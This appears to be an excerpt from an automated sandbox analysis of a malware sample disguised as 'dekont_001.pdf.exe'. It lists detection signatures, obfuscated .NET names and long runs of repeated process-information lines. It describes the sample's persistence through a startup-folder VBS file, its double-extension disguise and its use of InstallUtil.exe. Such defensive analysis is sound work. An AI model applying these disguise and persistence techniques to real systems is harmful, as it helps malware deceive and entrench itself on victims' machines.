Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.6770000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1844604505.0000000006770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_07106572 push edx; retf	0_2_07106573
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_071068BB pushfd ; retf	0_2_071068C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A2E60 push esp; iretd	1_2_066A2E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A6F13 push 00000006h; ret	1_2_066A6FE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A6F8B push 00000006h; ret	1_2_066A6FE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A7059 push 00000006h; iretd	1_2_066A705C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D3181 push ebx; retf	1_2_066D3182
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_07796572 push edx; retf	6_2_07796573
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_077968BB pushfd ; retf	6_2_077968C1

Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'qxSSwWj43dbLCniLnRl'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, a0Wrvoi7XduVLTpXjo3.cs	High entropy of concatenated method names: 'UESibCoyM9', 'q41ifBB8jW', 'npfiEVDiA6', 'H9TiyRwAA4', 'sgwiToa30a', 'fWfiPCwV8W', 'PK0il9Xx8l', 'o0biqN9AYV', 'dPji9Cyue1', 'b7OiWa7Q7a'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs	High entropy of concatenated method names: 'hrleFEjUWqvHtdK2GaW', 'XkuYYejCqaVNdj7tnc2', 'CSgttyVSkf', 'AmlAInjSVsPNtENyWT9', 'aiIL0RjJfZqeOGpYyf4', 'P5pAiYj8Ne93Nwk8MP6', 'xjpp0SjsGhbEy7kiHR3', 'CfxuhAju77ulIT6RImd', 'L8iaY5jpeyWubAfoR66', 'hQeQjGjAdnCkcidSwPM'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, b5qFSvtz87Q53JYvQi2.cs	High entropy of concatenated method names: 'd9SP6sTsuN', 'DvuPh4e5au', 'jkFPa25Nth', 'Cu8PxUor1J', 'GIgPn9OnNc', 'mwjP3pK8mQ', 'uKCPceh8hR', 'hdkf2wBX0j', 'lY1PRS4cBm', 'XeiPwKT1VR'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, YyRCunmwdBwrfBllKYy.cs	High entropy of concatenated method names: 'XQnmk0Lmh7', 'wKum0tjon0', 'VkQmgID1Te', 'CEumULoo6k', 'MEtmCBS0kY', 'TXE4GJUycWY4B1bjebV', 'RNlrreUTyt9stERkm1D', 'hegsjuUPiVpialHeHV1', 'auGWHLUleEpsuBelrXO', 'RiPKMUUqXfQaPfhhCET'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, hXhXjatUErAUcNrfNHH.cs	High entropy of concatenated method names: 'DGltGUPsaY', 'wfltocntFJ', 'o1qtrP0042', 'dB0t53Xxps', 'jvVtvXlTLD', 'mL8tOyiEBj', 't6Et16pybx', 'DNatHC3huc', 'mHutFjVGm0', 'alftQUu3L4'

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File created: C:\Users\user\AppData\Roaming\RequiredContract.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: dekont_001.pdf.exe

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
